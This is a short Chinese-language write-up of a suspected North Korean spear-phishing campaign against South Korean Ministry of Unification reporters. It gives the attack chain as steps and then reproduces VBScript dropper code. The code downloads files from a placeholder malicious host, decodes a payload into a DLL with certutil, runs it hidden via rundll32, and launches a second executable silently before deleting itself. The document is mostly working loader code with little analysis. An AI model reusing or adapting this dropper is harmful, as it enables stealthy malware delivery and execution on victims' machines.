1、信息来源

疑似朝鲜通过鱼叉攻击韩国统一部记者的APT事件整理

https://mp.weixin.qq.com/s/4IFV31MBNbANnCVaJj7ZPQ

https://twitter.com/blackorbird/status/1082553543280680962

2、利用思路

1、 下载http://恶意网址/note[.]png作为文件到%temp%路径下，通过【powershell Invoke-item】运行。

2、 下载http://恶意网址/svchow.dat改名为svchow[.]dat

3、 certutil -f –decode 强制覆盖文件、base64解码改名为dll

4、 通过powershell运行rundl32加载svchow.dll中的MyRTLCreateFunction函数运行恶意代码。

3、实例代码

下载代码：

Set wshShell = CreateObject("Wscript.shell")

dir = wshShell.ExpandEnvironmentStrings("%TEMP%")

docUrl = "http://恶意网址/note.png"

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")

dim bStrm: Set bStrm = createobject("Adodb.Stream")

xHttp.Open "GET", docUrl, False

xHttp.Send

docPath = dir + "\note.png"

with bStrm

	.type = 1 '//binary

	.open

	.write xHttp.responseBody

	.savetofile docPath, 2 '//overwrite

end With

CreateObject("Wscript.shell").Run "powershell Invoke-item '" + dir + "\note.png'", 0, true

docUrl = "http://恶意网址/svchow.dat"

dim xHttp2: Set xHttp2 = createobject("Microsoft.XMLHTTP")

dim bStrm2: Set bStrm2 = createobject("Adodb.Stream")

xHttp2.Open "GET", docUrl, False

xHttp2.Send

with bStrm2

	.type = 1 '//binary

	.open

	.write xHttp2.responseBody

	.savetofile dir + "\svchow.dat", 2 '//overwrite

end With

CreateObject("Wscript.shell").Run "powershell -windowstyle hidden certutil -f -decode " & dir & "\svchow.dat, " & dir & "\svchow.dll",0,true

CreateObject("Wscript.shell").Run "powershell -windowstyle hidden cmd /c rundll32 " & dir & "\svchow.dll,MyRTLCreateFunction",0,true

转码运行exe：

Dim fIn, fOut, sFilename, sBOM

sFilename = "C:\windows\temp\xxx.exe"

Set fIn = CreateObject("adodb.stream")

fIn.Type = 1 'adTypeBinary

fIn.Mode = adModeRead

fIn.Open

fIn.LoadFromFile sFilename

sBOM = fIn.Read(5)

' UTF8 BOM is 0xEF,0xBB,0xBF (decimal 239, 187, 191)

If AscB(MidB(sBOM, 1, 1)) = 255 _

        And AscB(MidB(sBOM, 2, 1)) = 254 Then

    fIn.Position = 2 ' Skip BOM

    Set fOut = CreateObject("adodb.stream")

    fOut.Type = 1 'adTypeBinary

    fOut.Mode = adModeReadWrite

    fOut.Open

    fIn.CopyTo fOut

    fOut.SaveToFile sFilename, 2 'adSaveCreateOverwrite

    fOut.Flush

    fOut.Close

	Set shell = CreateObject("Wscript.Shell")

	shell.Run "c:\windows\temp\xxx.exe",0,False

	Set fso = CreateObject("Scripting.FileSystemObject")

	fso.DeleteFile(WScript.ScriptName)

End If